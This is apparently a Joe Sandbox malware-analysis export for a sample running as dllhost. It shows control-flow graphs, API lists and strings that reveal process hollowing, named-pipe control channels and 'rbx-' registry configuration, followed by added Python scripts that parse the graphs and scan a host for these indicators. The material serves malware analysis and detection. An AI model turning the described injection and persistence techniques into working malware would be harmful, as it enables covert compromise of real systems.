                                                                                                                                                          • Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                                                                                                                                                          • Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
                                                                                                                                                          • Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                                                                                                                                                          • Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 214 140003204-140003225 215 14000322b 214->215 216 14000341d-140003423 214->216 217 140003231-140003237 215->217 218 14000338b-1400033c3 GetProcessHeap HeapAlloc K32EnumProcesses 215->218 219 140003599-1400035bd ReadFile 216->219 220 140003429-14000342c 216->220 223 140003382-140003384 ExitProcess 217->223 224 14000323d-140003240 217->224 221 140003652-140003664 218->221 222 1400033c9-1400033da 218->222 219->221 225 1400035c3-1400035ca 219->225 226 140003432-140003438 220->226 227 14000358f-140003594 call 140001f7c 220->227 222->221 228 1400033e0-140003416 call 140001868 * 2 222->228 230 140003246-140003249 224->230 231 1400032ea-140003315 RegOpenKeyExW 224->231 225->221 232 1400035d0-14000360b GetProcessHeap HeapAlloc call 140001cf0 225->232 233 140003534-140003547 call 1400020fc 226->233 234 14000343e-140003441 226->234 227->221 271 140003418 228->271 239 1400032db-1400032e5 230->239 240 14000324f-140003252 230->240 236 140003353-14000337d call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 231->236 237 140003317-14000334d RegDeleteValueW * 3 231->237 257 14000360d-140003613 232->257 258 14000363e-14000364c GetProcessHeap HeapFree 232->258 233->221 260 14000354d-14000355c call 1400020fc 233->260 242 140003443-140003449 234->242 243 140003480-140003491 call 1400020fc 234->243 236->221 237->236 239->221 248 140003254-14000325a 240->248 249 1400032ce-1400032d6 240->249 242->221 251 14000344f-140003479 call 140002c5c call 140002c88 ExitProcess 242->251 243->221 262 140003497-1400034b9 ReadFile 243->262 248->221 256 140003260-140003284 ReadFile 248->256 249->221 256->221 265 14000328a-140003291 256->265 257->258 266 140003615-140003627 257->266 258->221 260->221 277 140003562-14000358a ShellExecuteW 260->277 262->221 270 1400034bf-1400034c6 262->270 265->221 273 140003297-1400032c9 call 140001868 * 2 265->273 274 140003629-14000362b 266->274 275 14000362d-140003635 266->275 270->221 278 1400034cc-14000350a GetProcessHeap HeapAlloc ReadFile 270->278 271->221 273->221 274->275 281 140003639 call 140001eec 274->281 275->266 282 140003637 275->282 277->221 278->258 284 140003510-14000351c 278->284 281->258 282->258 284->258 287 140003522-14000352f call 140002434 284->287 287->258
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
                                                                                                                                                          • String ID: $rbx-dll32$$rbx-dll64$$rbx-stager$$rbx-svc32$$rbx-svc64$SOFTWARE$open
                                                                                                                                                          • API String ID: 4225498131-1538754800
                                                                                                                                                          • Opcode ID: 736ca42babcb8c521872a82743edff672a2e6888472d9d1dca7c806dbabe5d2e
                                                                                                                                                          • Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
                                                                                                                                                          • Opcode Fuzzy Hash: 736ca42babcb8c521872a82743edff672a2e6888472d9d1dca7c806dbabe5d2e
                                                                                                                                                          • Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 296 140002434-140002469 297 140002911 296->297 298 14000246f-14000247b 296->298 301 140002913-14000292d 297->301 299 140002493 298->299 300 14000247d-140002487 298->300 303 140002496-140002499 299->303 300->297 302 14000248d-140002491 300->302 302->303 304 1400024d4 303->304 305 14000249b-1400024b6 call 1400020cc 303->305 306 1400024d7-140002532 CreateProcessW 304->306 305->297 322 1400024bc-1400024c7 305->322 308 1400028d7-1400028df 306->308 309 140002538-14000254f 306->309 311 1400028e1-1400028ef OpenProcess 308->311 312 1400028fc-140002903 308->312 313 140002555-14000258f call 1400020cc VirtualAllocEx 309->313 314 140002730-140002767 call 1400020cc VirtualAllocEx 309->314 311->312 315 1400028f1-1400028f6 TerminateProcess 311->315 312->297 317 140002905-14000290c 312->317 313->308 326 140002595-1400025b1 WriteProcessMemory 313->326 314->308 327 14000276d-140002789 WriteProcessMemory 314->327 315->312 317->306 322->297 323 1400024cd 322->323 323->304 326->308 328 1400025b7-1400025dc VirtualProtectEx 326->328 327->308 329 14000278f-1400027b3 VirtualProtectEx 327->329 328->308 331 1400025e2-1400025f0 328->331 329->308 330 1400027b9-1400027c7 329->330 332 140002858-140002877 VirtualAlloc 330->332 333 1400027cd 330->333 334 140002682-1400026a1 VirtualAlloc 331->334 335 1400025f6 331->335 332->308 338 140002879-14000288f Wow64GetThreadContext 332->338 336 1400027d0-1400027f2 WriteProcessMemory 333->336 334->308 337 1400026a7-1400026be GetThreadContext 334->337 339 1400025f9-14000261b WriteProcessMemory 335->339 340 1400028d5 336->340 341 1400027f8-140002803 336->341 337->308 342 1400026c4-1400026e9 WriteProcessMemory 337->342 338->308 343 140002891-1400028b4 WriteProcessMemory 338->343 339->340 344 140002621-14000262c 339->344 340->308 345 140002805-140002809 341->345 346 14000280b 341->346 342->308 347 1400026ef-14000270c SetThreadContext 342->347 343->308 348 1400028b6-1400028ca Wow64SetThreadContext 343->348 349 140002634 344->349 350 14000262e-140002632 344->350 351 14000280f-14000283e call 140002930 VirtualProtectEx 345->351 346->351 347->308 352 140002712-140002720 ResumeThread 347->352 348->340 353 140002638-140002665 call 140002930 VirtualProtectEx 349->353 350->353 351->340 360 140002844-140002852 351->360 352->308 356 140002726-14000272b 352->356 353->340 359 14000266b-14000267c 353->359 356->301 359->334 359->339 360->332 360->336
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                                                                                                                                          • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                                                                                                                          • API String ID: 1036100660-1371749706
                                                                                                                                                          • Opcode ID: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                                                                                                                                                          • Instruction ID: 2cc4599025b35cf826ffc418a6ccceb484f0f008c335a408c33283198f0c2c0b
                                                                                                                                                          • Opcode Fuzzy Hash: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                                                                                                                                                          • Instruction Fuzzy Hash: DAD15DB6705A8187EB65CF63F84479AB7A0F788BC4F004025EB8A47BA4DF78D595CB04

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                          • String ID: d
                                                                                                                                                          • API String ID: 2005889112-2564639436
                                                                                                                                                          • Opcode ID: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                                                                                                                                                          • Instruction ID: 9172d928bd221ff1096d4d6b158f49becdf828e9a984a0b33df103b3ad9988b4
                                                                                                                                                          • Opcode Fuzzy Hash: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                                                                                                                                                          • Instruction Fuzzy Hash: 765138B2604B8086EB16DF62F4483AA77A1F79CBD9F444124EB4A07B78DF38C555C710

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                                                                                                                                          • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                          • API String ID: 3993315683-3414887735
                                                                                                                                                          • Opcode ID: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                                                                                                                                                          • Instruction ID: 0bd1eed236b6321b202bdd9012a21668a5814f2879643e8febc2c05628ee43d5
                                                                                                                                                          • Opcode Fuzzy Hash: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                                                                                                                                                          • Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                                                                                          • String ID: M$\\.\pipe\$rbx-childproc
                                                                                                                                                          • API String ID: 2203880229-2840927681
                                                                                                                                                          • Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                                                                                                                                                          • Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
                                                                                                                                                          • Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                                                                                                                                                          • Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4184240511-0
                                                                                                                                                          • Opcode ID: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                                                                                                                                                          • Instruction ID: e7c2dfd052af18fd3abcefe0f72c8446b9113f84b0d7c840ae7e34f71e75c1d0
                                                                                                                                                          • Opcode Fuzzy Hash: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                                                                                                                                                          • Instruction Fuzzy Hash: FF4146B2704A859AE711CF6AF8443DD63B1FB89B99F445225BF0A43A69DF38C159C304

Control-flow Graph

• Basic blocks (node: address range, calls): 404: 14000104c-1400010b9 RegQueryInfoKeyW; 405: 1400011b5-1400011d0; 406: 1400010bf-1400010c9; 407: 1400010cf-14000111f RegEnumValueW; 408: 1400011a5-1400011af; 409: 140001125-14000112a; 410: 14000112c-140001135; 411: 140001147-14000114c; 412: 140001137; 413: 140001199-1400011a3; 414: 14000114e-140001193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree; 415: 14000113b-14000113f; 416: 140001141-140001145
• Edges: 404->405, 404->406, 406->405, 406->407, 407->408, 407->409, 408->405, 408->407, 409->408, 409->410, 410->411, 410->412, 411->413, 411->414, 412->415, 413->408, 414->413, 415->408, 415->416, 416->411, 416->415
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                          • String ID: d
                                                                                                                                                          • API String ID: 3743429067-2564639436
                                                                                                                                                          • Opcode ID: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                                                                                                                                          • Instruction ID: 03f89dd543fa71545bde49b2618b44e89e47b203f0d8546e2499baea92addc30
                                                                                                                                                          • Opcode Fuzzy Hash: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                                                                                                                                          • Instruction Fuzzy Hash: D1412AB2614B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40

Control-flow Graph

• Basic blocks (node: address range, calls): 417: 1400017a8-1400017e4 RegOpenKeyExW; 418: 140001841-140001866 RegDeleteKeyExW; 419: 1400017e6; 420: 1400017f3-140001839 RegEnumKeyExW; 421: 1400017e8-1400017ed RegDeleteKeyW; 422: 14000183b RegCloseKey
• Edges: 417->418, 417->419, 419->420, 420->421, 420->422, 421->420, 422->418
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Delete$CloseEnumOpen
                                                                                                                                                          • String ID: SOFTWARE\$rbx-config
                                                                                                                                                          • API String ID: 3013565938-3990243012
                                                                                                                                                          • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                                                                                                                          • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                                                                                                                                                          • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                                                                                                                          • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
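The Control-flow Graph entries in this report are rendered images, and what survives in the text export is the flat node/edge dump behind them ("417 1400017a8-1400017e4 RegOpenKeyExW ... 417->418 ..."). The following is an added parser for that dump, written for this page and not part of Joe Sandbox or of the analysed sample; it recovers the basic blocks, the API called in each block, and the back edges, which is enough to read the registry-deletion function above as a loop of RegEnumKeyExW/RegDeleteKeyW over subkeys of the opened key followed by RegDeleteKeyExW on the key itself. The sample text is the graph dump of that function copied verbatim from the page; the token rules (decimal node ids, hex address ranges, "call <addr>" for intra-module calls, any other token an imported API name) are inferred from the dumps on this page.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the control_flow_graph dump of the registry-deletion
# function above (node 417 at 0x1400017a8), copied verbatim from the report.
SAMPLE = (
    "control_flow_graph 417 1400017a8-1400017e4 RegOpenKeyExW "
    "418 140001841-140001866 RegDeleteKeyExW 417->418 419 1400017e6 417->419 "
    "420 1400017f3-140001839 RegEnumKeyExW 419->420 421 1400017e8-1400017ed RegDeleteKeyW "
    "420->421 422 14000183b RegCloseKey 420->422 421->420 422->418"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
RANGE_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")


@dataclass
class Block:
    node: int
    start: int        # address of the first instruction
    end: int          # address of the last instruction (== start for a one-instruction block)
    calls: list = field(default_factory=list)   # callees in this block, in order


def parse_cfg(text):
    """Parse the flattened dump into ({node_id: Block}, [(src, dst), ...])."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges = {}, []
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
            continue
        # A block opens as "<node-id> <start>[-<end>]": decimal id, hex addresses.
        # Consuming both tokens at once is what keeps an all-digit address such as
        # 140001137 from being mistaken for a node id.
        if tok.isdigit() and i + 1 < len(tokens) and RANGE_RE.match(tokens[i + 1]):
            start_s, end_s = RANGE_RE.match(tokens[i + 1]).groups()
            start = int(start_s, 16)
            current = Block(int(tok), start, int(end_s, 16) if end_s else start)
            blocks[current.node] = current
            i += 2
            continue
        if current is None:
            raise ValueError(f"unexpected token before the first block: {tok}")
        # "call <addr>" is a call into the module itself; anything else is an API name.
        if tok == "call" and i + 1 < len(tokens):
            current.calls.append(f"call 0x{tokens[i + 1]}")
            i += 2
        else:
            current.calls.append(tok)
            i += 1
    return blocks, edges


def api_call_sites(blocks):
    """(block address, API name) for every imported API, ordered by address."""
    out = []
    for b in sorted(blocks.values(), key=lambda b: b.start):
        out.extend((f"0x{b.start:x}", c) for c in b.calls if not c.startswith("call "))
    return out


def back_edges(blocks, edges):
    """Edges that close a loop, found by DFS from the lowest-numbered node (the entry)."""
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    state, back = {}, []          # state: 1 = on the DFS stack, 2 = finished

    def visit(n):
        state[n] = 1
        for s in succ.get(n, []):
            if state.get(s) == 1:
                back.append((n, s))
            elif s not in state:
                visit(s)
        state[n] = 2

    visit(min(blocks))
    return back


if __name__ == "__main__":
    blocks, edges = parse_cfg(SAMPLE)
    for addr, api in api_call_sites(blocks):
        print(addr, api)
    for src, dst in back_edges(blocks, edges):
        print(f"loop: {src} -> {dst} ({' '.join(blocks[dst].calls)} ... {' '.join(blocks[src].calls)})")
```

On the sample this reports the single back edge 421->420, i.e. the RegEnumKeyExW block looping through RegDeleteKeyW until enumeration fails, after which RegCloseKey and RegDeleteKeyExW run; the same function can be pasted in for any other graph dump on the page.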

Control-flow Graph

• Basic blocks (node: address range, calls): 423: 140002cb0-140002cba; 424: 140002cbd-140002cd0 call 140002300; 427: 140002cd2-140002cdb Sleep; 428: 140002cdd-140002cea ConnectNamedPipe; 429: 140002d21-140002d26 Sleep; 430: 140002cec-140002d0d ReadFile; 431: 140002d2c-140002d35 DisconnectNamedPipe; 432: 140002d0f-140002d14; 433: 140002d16-140002d1f
• Edges: 423->424, 424->427, 424->428, 427->424, 428->429, 428->430, 429->431, 430->431, 430->432, 431->428, 432->431, 432->433, 433->431
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                                                                                          • String ID: \\.\pipe\$rbx-control
                                                                                                                                                          • API String ID: 2071455217-3647231676
                                                                                                                                                          • Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                                                                                                                                                          • Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
                                                                                                                                                          • Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                                                                                                                                                          • Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704
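The host artefacts named in the dllhost functions above are the pipe names "rbx-control" and "rbx-childproc" next to the "\\.\pipe\" prefix, and "rbx-config" next to "SOFTWARE\". The following is an added triage check, written for this page and not part of the report or the sample, that looks for those artefacts on a live host. It assumes that the sample concatenates the adjacent strings into the pipe names \\.\pipe\rbx-control and \\.\pipe\rbx-childproc and the key path SOFTWARE\rbx-config (Joe Sandbox separates distinct strings in a String ID with "$", so the report itself only shows the fragments), and, because the page does not show the hive or the registry view used, it checks HKLM and HKCU in both WOW64 views. The matching step is kept separate from collection so it can be run offline over pipe and key listings exported from another machine.

```python
import os
import sys

# Assumed full artefact names, built from the string fragments in the report above.
PIPE_INDICATORS = ("rbx-control", "rbx-childproc")
REG_SUBKEY = r"SOFTWARE\rbx-config"
REG_HIVES = ("HKLM", "HKCU")   # hive not visible on the page, so both are checked


def match_pipes(pipe_names):
    """Pipe names present on the host that equal an indicator (pipe names are case-insensitive)."""
    wanted = {p.lower() for p in PIPE_INDICATORS}
    return sorted(n for n in pipe_names if n.lower() in wanted)


def match_registry_keys(present_keys):
    """present_keys are 'HIVE\\path' strings, as produced by live_registry_keys()."""
    wanted = {f"{h}\\{REG_SUBKEY}".lower() for h in REG_HIVES}
    return sorted(k for k in present_keys if k.lower() in wanted)


def triage(pipe_names, present_keys):
    """Pure matching step; runs anywhere, on live or exported listings."""
    return {"pipes": match_pipes(pipe_names), "registry": match_registry_keys(present_keys)}


def live_pipes():
    # Listing the pipe namespace enumerates every named pipe on the host; no admin rights needed.
    return os.listdir(r"\\.\pipe")


def live_registry_keys():
    """{'HIVE\\path': [(value_name, data), ...]} for each view of the indicator key that exists."""
    import winreg   # Windows only
    roots = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    found = {}
    for hive, root in roots.items():
        for view in (winreg.KEY_WOW64_64KEY, winreg.KEY_WOW64_32KEY):
            try:
                with winreg.OpenKey(root, REG_SUBKEY, 0, winreg.KEY_READ | view) as key:
                    values, i = [], 0
                    while True:          # EnumValue raises OSError once the index runs out
                        try:
                            name, data, _kind = winreg.EnumValue(key, i)
                        except OSError:
                            break
                        values.append((name, data))
                        i += 1
                    found[f"{hive}\\{REG_SUBKEY}"] = values
                    break                # present in this view; the other view is redundant
            except OSError:
                continue                 # key absent in this hive/view
    return found


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("live collection needs Windows; use triage() on exported listings elsewhere")
    keys = live_registry_keys()
    hits = triage(live_pipes(), keys)
    for path in hits["registry"]:
        for name, data in keys[path]:
            print(f"{path} : {name} = {data!r}")   # the values are where the config would live
    print(hits)
```

A hit on either pipe while the key is absent is still worth a look: the deletion function above removes SOFTWARE\rbx-config and its subkeys, so the key may be gone while the pipe server in dllhost is still running.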
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3197395349-0
                                                                                                                                                          • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                                                                                                                          • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                                                                                                                                          • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                                                                                                                          • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3676546796-0
                                                                                                                                                          • Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                                                                                                                                          • Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
                                                                                                                                                          • Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                                                                                                                                          • Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
